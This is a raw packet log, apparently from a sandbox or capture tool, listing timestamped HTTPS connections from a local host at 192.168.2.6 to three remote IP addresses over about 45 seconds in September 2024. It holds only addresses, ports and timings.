Sep 16, 2024 21:21:49.841762066 CEST	49751	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:49.841828108 CEST	443	49751	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:49.841880083 CEST	49751	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:50.003736019 CEST	49751	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:50.187146902 CEST	49752	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:50.187256098 CEST	443	49752	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:50.187359095 CEST	49752	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:50.187658072 CEST	49752	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:50.187699080 CEST	443	49752	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:51.561172009 CEST	443	49752	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:51.565399885 CEST	49752	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:51.565429926 CEST	443	49752	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:51.773418903 CEST	443	49752	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:51.773559093 CEST	443	49752	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:51.773605108 CEST	443	49752	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:51.773626089 CEST	49752	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:51.773647070 CEST	443	49752	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:51.773736000 CEST	49752	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:51.774199009 CEST	443	49752	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:51.774539948 CEST	443	49752	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:51.774580002 CEST	49752	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:51.774585962 CEST	443	49752	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:51.774755001 CEST	443	49752	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:51.774827003 CEST	49752	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:51.775209904 CEST	49752	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:55.307163954 CEST	49754	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:55.307219028 CEST	443	49754	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:55.307356119 CEST	49754	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:55.308093071 CEST	49754	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:55.308123112 CEST	443	49754	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:55.782649040 CEST	443	49754	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:55.912364006 CEST	49754	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:55.912431002 CEST	443	49754	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:56.025464058 CEST	443	49754	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:56.025722027 CEST	443	49754	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:56.026093006 CEST	443	49754	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:56.026114941 CEST	443	49754	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:56.026175976 CEST	49754	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:56.026230097 CEST	443	49754	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:56.026261091 CEST	49754	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:56.026557922 CEST	443	49754	104.20.4.235	192.168.2.6
Sep 16, 2024 21:21:56.026665926 CEST	49754	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:56.082320929 CEST	49754	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:21:56.499504089 CEST	49755	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:56.499603987 CEST	443	49755	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:56.499697924 CEST	49755	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:56.500227928 CEST	49755	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:56.500266075 CEST	443	49755	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:57.064827919 CEST	443	49755	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:57.067473888 CEST	49755	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:57.067537069 CEST	443	49755	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:57.320100069 CEST	443	49755	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:57.320322037 CEST	443	49755	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:57.320344925 CEST	443	49755	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:57.320384026 CEST	49755	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:57.320410967 CEST	443	49755	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:57.320456982 CEST	49755	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:57.320765018 CEST	443	49755	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:57.321381092 CEST	443	49755	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:57.321407080 CEST	443	49755	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:57.321499109 CEST	443	49755	188.114.97.3	192.168.2.6
Sep 16, 2024 21:21:57.321558952 CEST	49755	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:21:57.322010040 CEST	49755	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:01.616805077 CEST	49756	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:01.616853952 CEST	443	49756	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:01.617079020 CEST	49756	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:01.617491007 CEST	49756	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:01.617506027 CEST	443	49756	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:02.453627110 CEST	443	49756	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:02.455836058 CEST	49756	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:02.455848932 CEST	443	49756	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:02.821283102 CEST	443	49756	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:02.821543932 CEST	443	49756	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:02.821579933 CEST	443	49756	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:02.821583986 CEST	49756	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:02.821594000 CEST	443	49756	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:02.821645021 CEST	49756	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:02.821655035 CEST	443	49756	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:02.821688890 CEST	443	49756	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:02.821723938 CEST	49756	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:02.822186947 CEST	49756	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:02.844949961 CEST	49757	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:02.845045090 CEST	443	49757	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:02.845123053 CEST	49757	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:02.845406055 CEST	49757	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:02.845443964 CEST	443	49757	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:03.509403944 CEST	443	49757	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:03.511293888 CEST	49757	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:03.511373043 CEST	443	49757	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:03.764926910 CEST	443	49757	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:03.765038967 CEST	443	49757	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:03.765070915 CEST	443	49757	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:03.765172005 CEST	49757	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:03.765234947 CEST	443	49757	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:03.765373945 CEST	49757	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:03.765749931 CEST	443	49757	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:03.766096115 CEST	443	49757	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:03.766129017 CEST	443	49757	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:03.766154051 CEST	49757	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:03.766172886 CEST	443	49757	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:03.766263008 CEST	443	49757	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:03.766323090 CEST	49757	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:03.766597986 CEST	49757	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:07.869920015 CEST	49758	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:22:07.869968891 CEST	443	49758	104.21.76.57	192.168.2.6
Sep 16, 2024 21:22:07.870032072 CEST	49758	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:22:07.870352983 CEST	49758	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:22:07.870371103 CEST	443	49758	104.21.76.57	192.168.2.6
Sep 16, 2024 21:22:08.335632086 CEST	443	49758	104.21.76.57	192.168.2.6
Sep 16, 2024 21:22:08.337333918 CEST	49758	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:22:08.337368965 CEST	443	49758	104.21.76.57	192.168.2.6
Sep 16, 2024 21:22:08.487924099 CEST	443	49758	104.21.76.57	192.168.2.6
Sep 16, 2024 21:22:08.488306999 CEST	443	49758	104.21.76.57	192.168.2.6
Sep 16, 2024 21:22:08.488399029 CEST	443	49758	104.21.76.57	192.168.2.6
Sep 16, 2024 21:22:08.488415956 CEST	49758	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:22:08.488485098 CEST	443	49758	104.21.76.57	192.168.2.6
Sep 16, 2024 21:22:08.488639116 CEST	49758	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:22:08.488657951 CEST	443	49758	104.21.76.57	192.168.2.6
Sep 16, 2024 21:22:08.489140987 CEST	443	49758	104.21.76.57	192.168.2.6
Sep 16, 2024 21:22:08.489200115 CEST	49758	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:22:08.489214897 CEST	443	49758	104.21.76.57	192.168.2.6
Sep 16, 2024 21:22:08.489885092 CEST	443	49758	104.21.76.57	192.168.2.6
Sep 16, 2024 21:22:08.489948034 CEST	49758	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:22:08.489962101 CEST	443	49758	104.21.76.57	192.168.2.6
Sep 16, 2024 21:22:08.490712881 CEST	443	49758	104.21.76.57	192.168.2.6
Sep 16, 2024 21:22:08.490828991 CEST	49758	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:22:08.490843058 CEST	443	49758	104.21.76.57	192.168.2.6
Sep 16, 2024 21:22:08.575417995 CEST	443	49758	104.21.76.57	192.168.2.6
Sep 16, 2024 21:22:08.575505018 CEST	49758	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:22:08.575530052 CEST	443	49758	104.21.76.57	192.168.2.6
Sep 16, 2024 21:22:08.575617075 CEST	443	49758	104.21.76.57	192.168.2.6
Sep 16, 2024 21:22:08.575690031 CEST	49758	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:22:08.575704098 CEST	443	49758	104.21.76.57	192.168.2.6
Sep 16, 2024 21:22:08.575844049 CEST	443	49758	104.21.76.57	192.168.2.6
Sep 16, 2024 21:22:08.575915098 CEST	49758	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:22:08.576242924 CEST	49758	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:22:08.679932117 CEST	49759	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:08.679971933 CEST	443	49759	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:08.680119038 CEST	49759	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:08.680402040 CEST	49759	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:08.680416107 CEST	443	49759	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:09.143805981 CEST	443	49759	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:09.145387888 CEST	49759	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:09.145407915 CEST	443	49759	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:09.599267006 CEST	443	49759	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:09.599432945 CEST	443	49759	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:09.599478960 CEST	49759	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:09.599494934 CEST	443	49759	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:09.599749088 CEST	443	49759	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:09.599798918 CEST	49759	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:09.599807024 CEST	443	49759	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:09.599946022 CEST	443	49759	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:09.599993944 CEST	49759	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:09.600596905 CEST	49759	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:09.624512911 CEST	49760	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:09.624561071 CEST	443	49760	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:09.624636889 CEST	49760	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:09.624928951 CEST	49760	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:09.624944925 CEST	443	49760	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:10.284509897 CEST	443	49760	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:10.339685917 CEST	49760	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:10.667819977 CEST	49760	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:10.667865038 CEST	443	49760	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:11.128739119 CEST	443	49760	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:11.128902912 CEST	443	49760	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:11.128993034 CEST	443	49760	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:11.129132986 CEST	443	49760	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:11.129200935 CEST	443	49760	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:11.129884958 CEST	443	49760	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:11.129930973 CEST	49760	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:11.129957914 CEST	443	49760	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:11.130183935 CEST	443	49760	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:11.131510019 CEST	49760	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:11.257992029 CEST	49760	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:14.743439913 CEST	49761	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:14.743510962 CEST	443	49761	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:14.743623972 CEST	49761	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:14.743858099 CEST	49761	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:14.743892908 CEST	443	49761	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:15.426311970 CEST	443	49761	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:15.429575920 CEST	49761	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:15.429609060 CEST	443	49761	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:15.557786942 CEST	443	49761	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:15.557899952 CEST	443	49761	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:15.557981968 CEST	49761	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:15.557987928 CEST	443	49761	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:15.558016062 CEST	443	49761	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:15.558068037 CEST	49761	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:15.558103085 CEST	443	49761	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:15.558321953 CEST	443	49761	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:15.558382034 CEST	49761	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:15.567405939 CEST	49761	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:16.306135893 CEST	49762	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:16.306231976 CEST	443	49762	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:16.306355953 CEST	49762	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:16.306632042 CEST	49762	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:16.306688070 CEST	443	49762	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:16.843338966 CEST	443	49762	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:16.845276117 CEST	49762	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:16.845360994 CEST	443	49762	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:17.089562893 CEST	443	49762	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:17.089700937 CEST	443	49762	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:17.089797974 CEST	49762	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:17.089838028 CEST	443	49762	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:17.089868069 CEST	443	49762	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:17.090689898 CEST	443	49762	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:17.090759993 CEST	49762	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:17.090764046 CEST	443	49762	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:17.090787888 CEST	443	49762	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:17.090816021 CEST	49762	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:17.091051102 CEST	443	49762	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:17.091120958 CEST	49762	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:17.091434956 CEST	49762	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:21.445631027 CEST	49763	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:21.445677996 CEST	443	49763	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:21.445734978 CEST	49763	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:21.446264029 CEST	49763	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:21.446271896 CEST	443	49763	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:21.928368092 CEST	443	49763	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:21.955859900 CEST	49763	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:21.955892086 CEST	443	49763	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:22.074008942 CEST	443	49763	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:22.074147940 CEST	443	49763	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:22.074194908 CEST	49763	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:22.074207067 CEST	443	49763	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:22.074289083 CEST	443	49763	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:22.074332952 CEST	49763	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:22.074338913 CEST	443	49763	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:22.074472904 CEST	443	49763	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:22.074521065 CEST	49763	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:22.083359957 CEST	49763	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:22.279218912 CEST	49764	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:22.279308081 CEST	443	49764	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:22.279407978 CEST	49764	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:22.279606104 CEST	49764	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:22.279635906 CEST	443	49764	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:22.968313932 CEST	443	49764	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:22.969933987 CEST	49764	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:22.969955921 CEST	443	49764	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:23.213413954 CEST	443	49764	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:23.213551044 CEST	443	49764	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:23.213644028 CEST	443	49764	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:23.213723898 CEST	49764	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:23.213737965 CEST	443	49764	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:23.213767052 CEST	443	49764	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:23.213797092 CEST	49764	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:23.214466095 CEST	443	49764	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:23.214550018 CEST	443	49764	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:23.214581013 CEST	49764	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:23.214595079 CEST	443	49764	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:23.214649916 CEST	49764	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:23.214658022 CEST	443	49764	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:23.214736938 CEST	443	49764	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:23.214857101 CEST	49764	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:23.215117931 CEST	49764	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:27.467482090 CEST	49765	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:27.467547894 CEST	443	49765	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:27.467621088 CEST	49765	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:27.479892969 CEST	49765	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:27.479948044 CEST	443	49765	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:27.976929903 CEST	443	49765	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:27.995692015 CEST	49765	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:27.995794058 CEST	443	49765	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:28.129288912 CEST	443	49765	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:28.129425049 CEST	443	49765	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:28.129488945 CEST	49765	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:28.129517078 CEST	443	49765	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:28.129545927 CEST	443	49765	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:28.129594088 CEST	49765	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:28.129630089 CEST	443	49765	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:28.130019903 CEST	443	49765	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:28.130069971 CEST	49765	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:28.139372110 CEST	49765	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:28.253745079 CEST	49766	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:28.253819942 CEST	443	49766	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:28.253885984 CEST	49766	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:28.254139900 CEST	49766	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:28.254158974 CEST	443	49766	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:28.775269032 CEST	443	49766	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:28.777672052 CEST	49766	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:28.777704954 CEST	443	49766	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:29.020729065 CEST	443	49766	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:29.020833015 CEST	443	49766	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:29.021137953 CEST	443	49766	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:29.021176100 CEST	49766	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:29.021183014 CEST	443	49766	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:29.021214008 CEST	443	49766	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:29.021266937 CEST	49766	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:29.021277905 CEST	443	49766	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:29.021347046 CEST	49766	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:29.021913052 CEST	443	49766	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:29.022049904 CEST	443	49766	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:29.022140980 CEST	49766	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:29.023664951 CEST	49766	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:33.366889954 CEST	49767	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:33.366935015 CEST	443	49767	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:33.367007971 CEST	49767	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:33.367352962 CEST	49767	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:33.367367983 CEST	443	49767	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:34.156716108 CEST	443	49767	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:34.159106016 CEST	49767	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:34.159135103 CEST	443	49767	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:34.303615093 CEST	443	49767	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:34.303683996 CEST	443	49767	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:34.303723097 CEST	443	49767	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:34.303761005 CEST	443	49767	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:34.303792000 CEST	49767	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:34.303812027 CEST	443	49767	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:34.303847075 CEST	49767	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:34.303881884 CEST	443	49767	104.20.4.235	192.168.2.6
Sep 16, 2024 21:22:34.303957939 CEST	49767	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:34.304397106 CEST	49767	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:22:34.320986986 CEST	49768	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:34.321062088 CEST	443	49768	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:34.321240902 CEST	49768	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:34.321453094 CEST	49768	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:34.321465015 CEST	443	49768	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:34.816567898 CEST	443	49768	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:34.818476915 CEST	49768	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:34.818509102 CEST	443	49768	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:35.052203894 CEST	443	49768	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:35.052330017 CEST	443	49768	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:35.052408934 CEST	49768	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:35.052419901 CEST	443	49768	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:35.052458048 CEST	443	49768	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:35.052618027 CEST	49768	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:35.052627087 CEST	443	49768	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:35.053227901 CEST	443	49768	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:35.053313017 CEST	443	49768	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:35.053423882 CEST	49768	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:22:35.053436041 CEST	443	49768	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:35.053504944 CEST	443	49768	188.114.97.3	192.168.2.6
Sep 16, 2024 21:22:35.053540945 CEST	49768	443	192.168.2.6	188.114.97.3
